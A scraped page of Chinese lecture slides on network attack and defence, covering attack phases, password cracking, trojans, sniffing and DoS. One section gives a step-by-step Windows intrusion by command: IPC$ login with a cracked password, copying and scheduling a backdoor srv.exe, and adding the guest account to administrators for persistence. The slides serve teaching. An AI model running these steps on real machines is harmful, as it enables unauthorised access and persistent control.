- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
网络的攻击和防范 网络攻击的三个阶段 1. 信息收集 2. 系统安全弱点的探测 (1)自编程序。 (2)利用公开的工具。 3.实施攻击 网络攻击是指可能导致一个网络受到破坏、 网络服务受到影响的所有行为。 系统入侵一般模式 一般入侵方法 1.口令入侵 所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档, 2.特洛伊木马术 特洛伊木马最典型的做法是黑客把一个能帮助完成某一特定动作的程序依附在某一合法用户的正常程序中,一旦用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。 3.监听法 如果两台主机进行通信的信息没有加密,只要使用某些网络监听工具,例如NetXray for Windows 95/98/NT,sniffit for linux、solaries等就可以轻而易举地截取包括口令和账号在内的信息资料。 4.E-mail技术 电子邮件轰炸(电子邮件“滚雪球”),指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计垃圾邮件,致使受害人邮箱被“炸”, 5.利用系统漏洞 一次入侵过程 环境介绍 本例当中的入侵发生在一个局域网中, 主机A为入侵者使用的主机,运行Windows 2000操作系统,IP地址为192.168.0.200; 主机V为被入侵主机,同样运行Windows 2000操作系统,IP地址为192.168.0.100。 一次入侵过程 入侵过程 信息收集 首先,利用扫描软件流光5.0来获取目标的开放端口信息和漏洞信息 假如流光扫到:IP地址192.168.0.100,用户名是administrators,密码为“1234”,如果是打算攻击的话,就可以用以下命令. 1. C:\net use \\192.168.0.100 \IPC$ “1234” /user:“admintitrators” 此命令与192.168.0.100建立一个连接. 2. C:\copy srv.exe \\ 192.168.0.100 \admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘)。 3. C:\net time \\ 192.168.0.100 查查时间,发现192.168.0.100 的当前时间是 2008/3/19 上午 11:00,命令成功完成。 4. C:\at \\ 192.168.0.100 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快) Telnet 192.168.0.100 99 接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单! 为了以防万一,我们再把guest激活加到管理组 C:\net user guest /active:yes 将对方的Guest用户激活 C:\net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 C:\net localgroup administrators guest /add 将Guest变为Administrator (如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) 一次入侵过程 消除入侵痕迹 常用命令 net share netstate net use 网络攻击的手段与防范 1. 密码破解攻击与防范 所谓密码破解攻击,是指使用某些合法用户帐号和密码登录到目的主机,然后再实施攻击。 (1)密码攻击原理 (2)破解用户的密码 网络攻击的手段与防范 (2)破解用户的密码 ① 通过网络监听非法得到用户密码,这类方法有一定的局限性,但危害性极大。 ② 再知道用户的帐号后(如电子邮件@前面的部分),利用一些专门软件强行破解用户密码,这种方法不受到网段限制,但攻击者要有足够的耐心和时间。 网络攻击的手段与防范 (3)密码攻击类型 ① 字典攻击 ③ 组合攻击 (4)密码的防范 使自己的密码不在英语字典中,且不可能被别人猜测出,定期改变密码。 特洛伊木马攻击 凡是非法驻留在目标计算机里,在目标计算机系统启动的时候自动运行,并在目标计算机上执行一些事先约定的操作,比如窃取密码等,这类程序都可以称为特洛伊木马程序。 木马除了拥有强大的远程控制功能外,还包括极强的破坏性。 拒绝服务攻击与防范 拒绝服务(Denial of Service,DoS),利用协议或系统的缺陷
文档评论(0)